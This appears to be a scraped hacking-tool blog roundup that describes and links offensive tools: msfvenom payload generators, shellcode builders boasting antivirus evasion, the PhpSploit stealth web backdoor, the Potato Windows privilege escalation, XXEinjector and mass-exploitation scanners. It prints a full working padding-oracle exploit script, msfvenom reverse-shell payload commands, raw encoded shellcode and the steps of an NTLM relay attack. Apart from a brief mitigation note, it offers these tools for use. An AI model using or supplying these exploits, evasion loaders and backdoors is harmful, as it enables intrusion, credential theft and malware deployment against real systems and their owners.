Changelog v1.4.1 : Supports non-root users & non english OSs.

MPC-v1-4-1
quick way to generate various “basic” Meterpreter payloads via msfvenom (part of the Metasploit framework).

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MPC itself). The rest is to make the user’s life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
+ Can’t remember your IP for a interface? Don’t sweat it, just use the interface name: eth0.
+ Don’t know what your external IP is? MPC will discover it: wan.
+ Want to generate one of each payload? No issue! Try: loop.
+ Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.
Install
+ Designed for Kali Linux v2.x & Metasploit v4.11+.
+ Kali v1.x should work.
+ OSX 10.11+ should work.
+ Weakerth4n 6+ should work.
+ …nothing else has been tested.

Installation using git:

git clone https://github.com/g0tmi1k/mpc && cd mpc
./mpc.sh

update
cd mpc 
git pull

Download : v1.4.1.zip  | v1.4.1.tar.gz
Source : https://github.com/g0tmi1k
Our Post Before : http://seclist.us/msfvenom-payload-creator-mpc-v-1-4-released.html

Latest Change 11/1/2016:
+ nosqlmap.py : Fixed crash setting options.

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases as well as web applications using NoSQL in order to disclose data from the database.
It is named as a tribute to Bernardo Damele and Miroslav’s Stampar’s popular SQL injection tool sqlmap, and its concepts are based on and extensions of Ming Chow’s excellent presentation at Defcon 21, “Abusing NoSQL Databases”. Presently the tool’s exploits are focused around MongoDB, but additional support for other NoSQL based platforms such as CouchDB, Redis, and Cassandra are planned in future releases.

NoSQLMap-v0-5

Requirements
On a Debian or Red Hat based system, the setup.sh script may be run as root to automate the installation of NoSQLMap’s dependencies.
Varies based on features used:
+ Metasploit Framework
+ MongoDB
+ Python with PyMongo
+ httplib2
+ and urllib available.

Features:
– Automated MongoDB and CouchDB database enumeration and cloning attacks.
– Extraction of database names, users, and password hashes through MongoDB web applications.
– Scanning subnets or IP lists for MongoDB and CouchDB databases with default access and enumerating versions.
– Dictionary and brute force password cracking of recovered MongoDB and CouchDB hashes.
– PHP application parameter injection attacks against MongoClient to return all database records.
– Javascript function variable escaping and arbitrary code injection to return all database records.
– Timing based attacks similar to blind SQL injection to validate Javascript injection vulnerabilities with no feedback from the application.

Installation using git:

git clone https://github.com/tcstool/NoSQLMap && cd NoSQLMap
python setup.py

Debian/Ubuntu/Kali:
Makesure all dependency has been install like Metasploit Framework & MongoDB.
apt-get install mongodb (make sure you have privileges access/root user)
sudo apt-get install python-pbkdf2 (don't use pip, error because letter & upper case PBKDF2)
sudo apt-get install python-httplib2
sudo apt-get install python-ipcalc
sudo apt-get install python-CouchDB
then run
./nosqlmap.py

Update
cd NoSQLMap
git pull

Source : http://www.nosqlmap.net | Our post Before

[ DISCLAMER ]
The author does not hold any responsibility about the bad use of this script, remmenber that attacking targets without prior concent its ilegal and punish by law.

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

CRISP.SH 1.0.7 – metasploit Shellcode generator/compiler/listenner (this script has been tested on Kali 2.0, Ubuntu 14.04, Arch Linux, FreeBSD, Redhat, Centos, Fedora and Mac OSX)

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE execute)

Features:
option – build – target – format – output
—
1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – PYTHON – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – RUBY – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – webserver – PHP – PHP
—
V – msfvenom exercises console
F – FAQ (frequent ask questions)
R – exit shellcode generator

Usage:

download crisp-shellcode-generator.zip
unzip it
cd
./crisp.sh

Download : crisp-shellcode-generator.zip
Source :http://sourceforge.net/p/crisp-shellcode-generator/

changelog Version 2.3.0 (IN DEVELOPMENT):
+ Fix issue #9 (small bug in api.payload.Payload())
+ lrun command is now able to change PWD (issue #10)
+ Remove deprecated lcd and lpwd commands.
+ Fix some small bugs and documentation misspells.
+ Fix issue #6 (*_proxy env var handling through http tunnel).
+ All settings can now be reset with set <VAR> %%DEFAULT%%
+ Add full backward compatibility with older phpsploit session files.
+ Fix issue #1 (the ls plugin leaves at first invalid path)
+ Fix no existing file in datatypes/Path
+ Fix issue #5 – Add a ‘–browser’ option to phpinfo plugin for html display. ### Version 2.2.0b (2014-08-09)
+ Rewritten the whole PhpSploit framework in python 3 with new skeleton.
+ The system have been renamed into run.
+ Add corectl command, which includes some core debugging utils.
+ TEXTEDITOR setting has been renamed to EDITOR.
+ WEBBROWSER setting has been renamed to BROWSER.
+ The infect command has been removed, its role is now taken by exploit.
+ The new session command now manages the old load and save commands.
+ The set command now supplies a new keyword (“+”) for line appending.
+ Any setting now suports random choice from multiple values, with the new set command’s + keyword, that uses SettingVar class as data wrapper.
+ The eval command has been replaced by source, more restrictive.
+ The lastcmd command has been replaced by backlog, more simple.
+ The phpsploit source code has moved to ./src/ directory.
+ Plugins path is now available at root directory.
+ User plugins can now overwrite core plugins (~/.phpsploit/plugins/)

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server

Features :
–Efficient: More than 20 plugins to automate post-exploitation tasks
+ Run commands and browse filesystem, bypassing PHP security restrictions
+ Upload/Download files between client and target
+ Edit remote files through local text editor
+ Run SQL console on target system
+ Spawn reverse TCP shells

–Stealth: The framework is made by paranoids, for paranoids
+ Nearly invisible by log analysis and NIDS signature detection
+ Safe-mode and common PHP security restrictions bypass
+ Communications are hidden in HTTP Headers
+ Loaded payloads are obfuscated to bypass NIDS
+ http/https/socks4/socks5 Proxy support

–Convenient: A robust interface with many crucial features
+ Cross-platform on both the client and the server.
+ Powerful interface with completion and multi-command support
+ Session saving/loading feature, with persistent history
+ Multi-request support for large payloads (such as uploads)
+ Provides a powerful, highly configurable settings engine
+ Each setting, such as user-agent has a polymorphic mode
+ Customisable environment variables for plugin interaction
+ Provides a complete plugin development API

installation & usage:

git clone https://github.com/nil0x42/phpsploit && cd phpsploit
./phpsploit

Updates
cd phpsploit
git pull

Download : master.zip  | or Git Clone | Our Post Before
Source : https://github.com/nil0x42

An exploit for the Padding Oracle Attack. Tested against ASP.NET, works like a charm. The CBC mode must use PKCS7 for the padding block. This is an implementation of this great article Padding Oracle Attack. I advise you to read it if you want to understand the basic of the attack. This exploit allow block size of 8 or 16 this mean it can be use even if the cipher use AES or DES.

example-usage

Usage:

git clone https://github.com/mpgn/Padding-oracle-attack && cd Padding-oracle-attack
python exploit.py -h (for full print helper)

exploit.py Script:

#! /usr/bin/python

'''
    Padding Oracle Attack implementation of this article https://not.burntout.org/blog/Padding_Oracle_Attack/
    Author: mpgn <martial.puygrenier@gmail.com>
    Date: 2016
'''

import argparse
import httplib, urllib
import re
import binascii
import sys
import logging
import time
from binascii import unhexlify, hexlify
from itertools import cycle, izip

####################################
# CUSTOM YOUR RESPONSE ORACLE HERE #
####################################
''' the function you want change to adapte the result to your problem '''
def test_validity(response,error):

    try:
        value = int(error)
        if int(response.status) == value:
            return 1
    except ValueError:
        pass  # it was a string, not an int.

    # oracle repsonse with data in the DOM
    data = response.read()
    if data.find(error) == -1:
        return 1
    return 0

################################
# CUSTOM YOUR ORACLE HTTP HERE #
################################
def call_oracle(host,cookie,url,post,method,up_cipher):
    if post:
        params = urllib.urlencode({post})
    else:
        params = urllib.urlencode({})
    headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain", 'Cookie': cookie}
    conn = httplib.HTTPConnection(host)
    conn.request(method, url + up_cipher, params, headers)
    response = conn.getresponse()
    return conn, response

# the exploit don't need to touch this part
# split the cipher in len of size_block
def split_len(seq, length):
    return [seq[i:i+length] for i in range(0, len(seq), length)]

''' create custom block for the byte we search'''
def block_search_byte(size_block, i, pos, l):
    hex_char = hex(pos).split('0x')[1]
    return "00"*(size_block-(i+1)) + ("0" if len(hex_char)%2 != 0 else '') + hex_char + ''.join(l)    

''' create custom block for the padding'''
def block_padding(size_block, i):
    l = []
    for t in range(0,i+1):
        l.append(("0" if len(hex(i+1).split('0x')[1])%2 != 0 else '') + (hex(i+1).split('0x')[1]))
    return "00"*(size_block-(i+1)) + ''.join(l)

def hex_xor(s1,s2):
    return hexlify(''.join(chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(unhexlify(s1), cycle(unhexlify(s2)))))

def run(cipher,size_block,host,url,cookie,method,post,iv,error):
    found        = False
    valide_value = []
    result       = []
    len_block    = size_block*2
    cipher_block = split_len(cipher, len_block)

    if iv != '':
        cipher_block.insert(0,iv)

    if len(cipher_block) == 1 and iv == '':
        print "[-] Abort there is only one block but no IV"
        sys.exit()  
    #for each cipher_block
    for block in reversed(range(1,len(cipher_block))):
        if len(cipher_block[block]) != len_block:
            print "[-] Abort length block doesn't match the size_block"
            break
        print "[+] Search value block : ", block
        #for each byte of the block
        for i in range(0,size_block):
            # test each byte max 255
            for ct_pos in range(0,256):
                # 1 xor 1 = 0 or valide padding need to be checked
                if ct_pos != i+1 or (len(valide_value) > 0  and int(valide_value[len(valide_value)-1],16) == ct_pos):

                    bk = block_search_byte(size_block, i, ct_pos, valide_value) 
                    bp = cipher_block[block-1]
                    bc = block_padding(size_block, i) 
                    if args.verbose == True:
                        print "[+] Block M_Byte : %s"% bk
                        print "[+] Block C_{i-1}: %s"% bp
                        print "[+] Block Padding: %s"% bc

                    tmp = hex_xor(bk,bp)
                    cb  = hex_xor(tmp,bc).upper()

                    up_cipher  = cb + cipher_block[block]
                    print "[+] Test [Byte ",''.join('%02i'% ct_pos),"/256 - Block",block,"]: ", up_cipher
                    if args.verbose == True:
                        print ''
                    #time.sleep(0.5)

                    # we call the oracle, our god
                    connection, response = call_oracle(host,cookie,url,post,method,up_cipher)
                    if args.verbose == True:
                        print "[+] HTTP ", response.status, response.reason
                    
                    if test_validity(response,error):
                        found = True
                        connection.close()
                        
                        # data analyse
                        value = re.findall('..',bk)
                        valide_value.insert(0,value[size_block-(i+1)])
                        print "[+] Found", i+1,  "bytes :", ''.join(valide_value)
                        print ''

                        # change byte of the block
                        #sys.exit()
                        break 
            if found == False:
                print "[-] Error decryption failed"
                sys.exit()
            found = False

        result.insert(0, ''.join(valide_value))
        valide_value = []

    print ''
    hex_r = ''.join(result)
    print "[+] Decrypted value (HEX):", hex_r.upper()
    padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
    print "[+] Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")

if __name__ == '__main__':                           

    parser = argparse.ArgumentParser(description='Poc of BEAST attack')
    parser.add_argument('-c', "--cipher",               required=True,              help='cipher you want to decrypt')
    parser.add_argument('-l', '--length_block_cipher',  required=True, type=int,    help='lenght of a block cipher: 8,16')
    parser.add_argument("--host",                       required=True,              help='url example: /page=')
    parser.add_argument('-u', "--urltarget",            required=True,              help='url example: /page=')
    parser.add_argument('--error',                      required=True,              help='Error that oracle give us example: 404,500,200 OR in the dom example: "<h2>Padding Error<h2>"')
    parser.add_argument('--iv',             help='IV of the CBC cipher mode',       default="")
    parser.add_argument('--cookie',         help='Cookie example: PHPSESSID=9nnvje7p90b507shfmb94d7',   default="")
    parser.add_argument('--method',         help='Type methode like POST GET default GET',              default="GET")
    parser.add_argument('--post',           help="POST data example: 'user':'value', 'pass':'value'",    default="")
    parser.add_argument('-v', "--verbose",  help='debug mode, you need a large screen', action="store_true")
    args = parser.parse_args()

    run(args.cipher, args.length_block_cipher, args.host, args.urltarget, args.cookie, args.method, args.post, args.iv, args.error)

Source :https://github.com/mpgn

Changelog v0.9.6:
+ java serialization added.
+ Prints error to console if can’t load module:
– fix: Resizing width of controls with resizing width of run module dialog
– fix: Code editor loads immediately
– fix: Download link now works.

This software is necessary for learning and improving skills and knowledge of attacks on information systems and to conduct audits and proactive protection. The need to develop domestic Pentest framework – accessible, affordable, high-confidence – is long overdue. Therefore, for domestic (as well as to friendly domestic) markets IB was created EAST framework. EAST is a framework that has in its arsenal all the necessary tools to operate a broad range of vulnerabilities from the Web to a buffer overflow. From other similar instruments EAST is simple and easy to use. To master it, and begin to develop in the field of information security can be even a novice researcher!

east-v0-9-6

Main characteristics:
+Security framework! Software used for information security must be a high level of user confidence. The EAST is implemented open, easily verifiable source code for Python. it is used for all components of the framework and modules. In this relatively small amount of code simplifies the verification of any user. During installation no changes in the OS is not performed
+ Maximum simplicity of the framework. Download the archive, run the main python script start.py, implementing the start-stop exploits, messaging … All management – locally or remotely through a browser.
+ Easily create and edit. The ability to edit and add modules and exploits “on the fly” without restarting. Code module body is simple and minimal volume.
+ Cross-platform + minimum requirements and dependencies. Tested on Windows and Linux. I should work wherever there is Python. The framework contains all the dependencies and “pulls” ext. libraries.
+ Full functionality of the classic framework Pentest! Despite the simplicity and “no congestion” – has in its arsenal of all necessary means to operate a broad range of vulnerabilities from the Web to a buffer overflow.
+ Great opportunities for capacity. Server-client architecture, API for messaging, support libraries – allow third party developers to create their own open-source solutions, or participate in the development of EAST.

east-cli

Exploit list:
+ ef_bitdefender_gravityzone_dt.py Directory traversal
+ ef_cogento_datahub_afd.py Arbitrary File Download
+ ef_e_detective_afd.py Arbitrary File Download
+ ef_easyfile_webserver_sbo.py Stack Buffer Overwlow
+ ef_fhfs_rce.py Remote Command Execution
+ ef_joomla_gallery_wd_bsqli.py Blind SQL Injection
+ ef_solarwinds_log_and_event_manager_rce.py Remote Command Execution
+ ef_symantec_pcanywhere_host_rce.py Remote Command Execution
+ ef_wincc_miniweb_dos.py Denial of Service
+ ef_winrar_rce.py Remote Command Execution
+ port_scanner.py Tools

Installation and Usage:

git clone https://github.com/C0reL0ader/EaST && cd EaST
python start.py
then open your favorite Browser for GUI.

Updates:
cd EaST
git pull

Source: https://github.com/C0reL0ader & http://eastfw.com/  | Our Post Before

Executable compiled with this code is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files: binary executable and payload file into the same directory.
x86 binary will run on both x86 and x86_64 Windows systems. In case when payload is a meterpreter, you should have no issues when migrating x86 meterpreter to x86_64 processes.

Usage steps:
1. prepare one-line payload (x86), e.g:

msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" ; echo

2. save as [executable-name-without-exe-extension].mf in same directory as executable payload running calc.exe generated using above command:

\xbb\x28\x30\x85\x5b\xd9\xf7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x5a\x0e\x03\x72\x3e\x67\xae\x7e\xd6\xee\x51\x7e\x27\x91\xd8\x9b\x16\x83\xbf\xe8\x0b\x13\xcb\xbc\xa7\xd8\x99\x54\x33\xac\x35\x5b\xf4\x1b\x60\x52\x05\xaa\xac\x38\xc5\xac\x50\x42\x1a\x0f\x68\x8d\x6f\x4e\xad\xf3\x80\x02\x66\x78\x32\xb3\x03\x3c\x8f\xb2\xc3\x4b\xaf\xcc\x66\x8b\x44\x67\x68\xdb\xf5\xfc\x22\xc3\x7e\x5a\x93\xf2\x53\xb8\xef\xbd\xd8\x0b\x9b\x3c\x09\x42\x64\x0f\x75\x09\x5b\xa0\x78\x53\x9b\x06\x63\x26\xd7\x75\x1e\x31\x2c\x04\xc4\xb4\xb1\xae\x8f\x6f\x12\x4f\x43\xe9\xd1\x43\x28\x7d\xbd\x47\xaf\x52\xb5\x73\x24\x55\x1a\xf2\x7e\x72\xbe\x5f\x24\x1b\xe7\x05\x8b\x24\xf7\xe1\x74\x81\x73\x03\x60\xb3\xd9\x49\x77\x31\x64\x34\x77\x49\x67\x16\x10\x78\xec\xf9\x67\x85\x27\xbe\x88\x67\xe2\xca\x20\x3e\x67\x77\x2d\xc1\x5d\xbb\x48\x42\x54\x43\xaf\x5a\x1d\x46\xeb\xdc\xcd\x3a\x64\x89\xf1\xe9\x85\x98\x91\x6c\x16\x40\x78\x0b\x9e\xe3\x8

3. once executable is run, payload will be parsed, loaded into separate thread and executed in memory:

calc-foolav

Download : foolav.zip(55 KB)
Source : https://github.com/hvqzao

How it works?
Potato takes advantage of known issues in Windows to gain local privilege escalation, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing. Using the techniques outlined below, it is possible for an unprivileged user to gain “NT AUTHORITY\SYSYTEM” level access to a Windows host in default configurations.
The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches:

Potato – Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012

1. Local NBNS Spoofer
NBNS is a broadcast UDP protocol for name resolution commonly used in Windows environments. In penetration testing, we often sniff network traffic and respond to NBNS queries observed on a local network. For privilege escalation purposes, we can’t assume that we are able to sniff network traffic, so how can we accomplish NBNS spoofing?
If we can know ahead of time which host a target machine (in this case our target is 127.0.0.1) will be sending an NBNS query for, we can craft a response and flood the target host with NBNS responses (since it is a UDP protocol). One complication is that a 2-byte field in the NBNS packet, the TXID, must match in the request and response. We can overcome this by flooding quickly and iterating over all 65536 possible values.
In testing, this has proved to be 100% effective.

2. Fake WPAD Proxy Server
With the ability to spoof NBNS responses, we can target our NBNS spoofer at 127.0.0.1. We flood the target machine (our own machine) with NBNS response packets for the host “WPAD”, or “WPAD.DOMAIN.TLD”, and we say that the WPAD host has IP address 127.0.0.1.
At the same time, we run an HTTP server locally on 127.0.0.1. When it receives a request for “http://wpad/wpad.dat”, it responds with something like the following:

FindProxyForURL(url,host){
    if (dnsDomainIs(host, "localhost")) return "DIRECT";
    return "PROXY 127.0.0.1:80";}

This will cause all HTTP traffic on the target to be redirected through our server running on 127.0.0.1.
Interestingly, this attack when performed by even a low privilege user will affect all users of the machine. This includes administrators, and system accounts. See the screenshots “egoldstein_spoofing.png” and “dade_spoofed.png” for an example.

3. HTTP -> SMB NTLM Relay
With all HTTP traffic now flowing through a server that we control, we can do things like request NTLM authentication…
In the Potato exploit, all requests are redirected with a 302 redirect to “http://localhost/GETHASHESxxxxx”, where xxxxx is some unique identifier. Requests to “http://localhost/GETHASHESxxxxx” respond with a 401 request for NTLM authentication.
The NTLM credentials are relayed to the local SMB listener to create a new system service that runs a user-defined command. This command will run with “NT AUTHORITY\SYSTEM” privilege.

Mitigations:
Enabling “Extended Protection for Authentication” in Windows should stop NTLM relay attacks.
SMB Signing may also mitigate this type of attack, however this would require some more research on my part to confirm.

Off Broadcast NBNS Spoofing
Using the same NBNS spoofing technique as the Potato exploit, we can perform NBNS spoofing against any host for which we can talk to UDP 137. We simply need to send UDP packets quickly enough to sneak in a valid reply before the NBNS request times out.

Download : potato-master.zip https://github.com/breenmachine/Potato/archive/master.zip
Source : https://github.com/breenmachine

[ DISCLAMER ]
The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law.

Latest change v1.0.8:
+ Biprodeep python execution example
+ 0entropy powershell
+ output folder fix
+ misspeeling fixes

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

venom.sh v1.0.8

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

Features:
option – build – target – format – output
—
1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – PYTHON – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – RUBY – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – webserver – PHP – PHP
—
V – msfvenom exercises console
F – FAQ (frequent ask questions)
R – exit shellcode generator

Usage:

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell
cd crisp-shellcode-generator-shell
./venom.sh

UPdates:
cd cd crisp-shellcode-generator-shell
git pull

[ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE? ]
The default way to generate a windows binarie payload (.exe) using msfvenom its achieved through -f flag (Output format)
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allow us to build shellcode in diferent formats
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the follow command: sudo msfvenom --help-formats

now lets generate a simple shellcode to windows/shell/reverse_tcp
chosing powershell as output format "note that we will not use
the flag -o (Save the payload) option, this way the shellcode
generated will only displays in current terminal windows".
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

our post before
Source :http://sourceforge.net/p/crisp-shellcode-generator/

JReFrameworker v1.1.1

Changelog latest version 1.1.1.201601161527:
+ Adding command line options for dropper jar, more reliable output options

JReFrameworker is an Eclipse plugin for creating and building projects that allow the user to write annotated Java source that is automatically merged or inserted into the runtime. The framework supports developing and debugging attack modules directly in the Eclipse IDE. Working at the intended abstraction level of source code allows the attacker to “write once, exploit anywhere”.

Project road map support:
+ A payload dropper with support for Metasploit Post-Exploitation Modules
+ Comprehensive review of runtime update strategies (in progress)
+ Support for merging class constructors, initializers, and static initializers
+ Enhanced bytecode validity checks with respect to the entire runtime library (not just the generated class files)
+ Lots of example attack modules!
+ Incremental build support
+ Evaluate attacking other JRE based runtimes (Scala, JRuby, Jython, etc.)

Installing from update site

Follow the steps below to install the JReFrameworker plugin from the Eclipse update site.
1. Start Eclipse, then select Help > Install New Software.
2. Click Add, in the top-right corner.
3. In the Add Repository dialog that appears, enter “JReFrameworker” for the Name and “http://ben-holland.com/JReFrameworker/updates/” for the Location.
4. In the Available Software dialog, select the checkbox next to “WAR Binary Processing” and click Next followed by OK.
5. In the next window, you’ll see a list of the tools to be downloaded. Click Next.
6. Read and accept the license agreements, then click Finish. If you get a security warning saying that the authenticity or validity of the software can’t be established, click OK.
7. When the installation completes, restart Eclipse.

Module:
This extended introductory tutorial demonstrates how to create a simple attack module to hide a file using JReFrameworker and provides a basic understanding of the underlying bytecode manipulations performed by the tool.

Source : https://github.com/benjholla | https://ben-holland.com

changelog v5.0:
+ Changes all structure file.

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

Libreries to install:
ap-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works in linux platforms. Best Run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | if you use a windows you can download manualy.

ATSCAN-v5-0

Examples:
Simple search:
Search: –dork [dork] –level [level]
Search + get ip: –dork [dork] –level [level] –ip
Search + get ip + server: –dork [dork] –level [level] –ip –server
Search with many dorks: –dork [dork1,dork2,dork3] –level [level]
Search + get ip+server: –dork [dorks.txt] –level [level]
Search + set save file: –dork [dorks.txt] –level [level] –save myfile.txt
Search + Replace + Exploit: –dork [dorks.txt] –level [level] –replace [string] –with [string] –valid [string]

Subscan from Serach Engine:
Search + Exploitation: –dork [dork] –level [10] –xss/–lfi/–wp …
Search + Server Exploitation: -t [ip] –level [10] –xss/–lfi/–wp …
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –exp [exploit] –xss/–lfi/–wp …

Validation:
Search + Exploit + Validation: –dork [dork] –level [10] –exp –isup/–valid [string]
Search + Server Exploit + Validation: -t [ip] –level [10] –exp –isup/–valid [string]
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –isup/–valid [string]

Use List / Target:
-t [target/targets.txt] –exp –isup/–valid [string]
-t [target/targets.txt] –xss/–lfi ..

Server:
Get Server sites: -t [ip] –level [value] –sites
Get Server wordpress sites: -t [ip] –level [value] –wp
Get Server joomla sites: -t [ip] –level [value] –joom
Get Server upload sites: -t [ip] –level [value] –upload
Get Server zip sites files: -t [ip] –level [value] –zip
WP Arbitry File Download: -t [ip] –level [value] –wpadf
Joomla RFI: -t [ip] –level [1] –joomfri –shell [shell link]
Scan basic tcp (quick): -t [ip] –ports –basic tcp
Scan basic udp basic (quick): -t [ip] –ports –basic udp
Scan basic udp+tcp: -t [ip] –ports –basic udp+tcp
Scan complete tcp: -t [ip] –ports –all tcp
Scan complete udp: -t [ip] –ports –all udp
Scan complete udp+tcp: -t [ip] –ports –all udp+tcp
Scan rang tcp: -t [ip] –ports –select tcp –start [value] –end [value]
Scan rang udp: -t [ip] –ports –select udp–start [value] –end [value]
Scan rang udp + tcp: -t [ip] –ports –select udp+tcp –start [value] –end [value]

Encode / Decode:
Generate MD5: –md5 [string]
Encode base64: –encode64 [string]
Decode base64: –decode64 [string]

External Command:
–dork [dork/dorks.txt] –level [level] –command “curl -v –TARGET”
–dork [dork/dorks.txt] –level [level] –command “curl -v –FULL_TARGET”
-t [target/targets.txt] –level [level] –command “curl -v –TARGET”
-t [target/targets.txt] –command “curl -v –FULL_TARGET”

How to Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
perl atscan.pl

Update:
cd ATSCAN
git pull

Source : https://github.com/AlisamTechnology | Our Post Before

Latest change 19/1/2016:
+  XXEinjector.rb ; All Structure Files changes.

XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.

xxeinjector

Usage:

git clone https://github.com/enjoiz/XXEinjector && cd XXEinjector
ruby XXEinjector.rb

Updates:
cd XXEinjector
git pull

xxeinjector.rb script:

#!/usr/bin/env ruby

require 'socket'
require 'fileutils'
require 'uri'
require 'net/http'
require 'net/https'
require 'base64'
require 'readline'

# CONFIGURE
host = "" # our external ip
$path = "" # path to enumerate
$file = "" # file with vulnerable HTTP request
$secfile = "" # file with second request (2nd order)
enum = "ftp" # which out of band protocol should be used for file retrieval - ftp/http/gopher
$logger = "n" # only log requests, do not send anything

$proto = "http" # protocol to use - http/https
$proxy = "" # proxy host
$proxy_port = "" # proxy port

enumports = "" # which ports should be checked if they are unfiltered for reverse connections
phpfilter = "n" # if yes php filter will be used to base64 encode file content - y/n
$urlencode = "n" # if injected DTD should be URL encoded
enumall = "n" # if yes XXEinjector will not ask what to enum (prone to false positives) - y/n
$brute = "" # file with paths to bruteforce
$direct = "" # if direct exploitation should be used, this parameter should contain unique mark between which results are returned

hashes = "n" # steal Windows hashes
upload = "" # upload this file into temp directory using Java jar schema
expect = "" # command that gets executed using PHP expect
$xslt = "n" # tests for XSLT

$test = false # test mode, shows only payload
$dtdi = "y" # if yes then DTD is injected automatically
$rproto = "file" # file or netdoc protocol to retrieve data
$output = "brute.log" # output file for brute and logger modes
$verbose = "n" # verbose messaging
timeout = 10 # timeout for receiving responses
$contimeout = 30 # timeout used to close connection with server

$port = 0 # remote host application port
$remote = "" # remote host URL/IP address

http_port = 80 # http port that receives file contents/directory listings and serves XML files
ftp_port = 21 # ftp port that receives file contents/directory listings
gopher_port = 70 # gopher port that receives file contents/directory listings
jar_port = 1337 # port accepts connections and then sends files
xslt_port = 1337 # port that is used to test for XSLT injection

# holds HTTP responses
$response = ""
# regex to find directory listings
$regex = /^[$.\-_~ 0-9A-Za-z]+$/
# array that holds filenames to enumerate
$filenames = Array.new
# temp path holders - hold next filenames in different formats for enumeration
$nextpath = ""
enumpath = ""
$tmppath = ""
$directpath = ""
# array that contains skipped and allowed paths
blacklist = Array.new
whitelist = Array.new
# other variables
$method = "post" # HTTP method - get/post
cmp = "" # holds user input
switch = 0 # this switch locks enumeration if response is pending
i = 0 # main counter
$time = 1 # HTTP response timeout

# set all variables
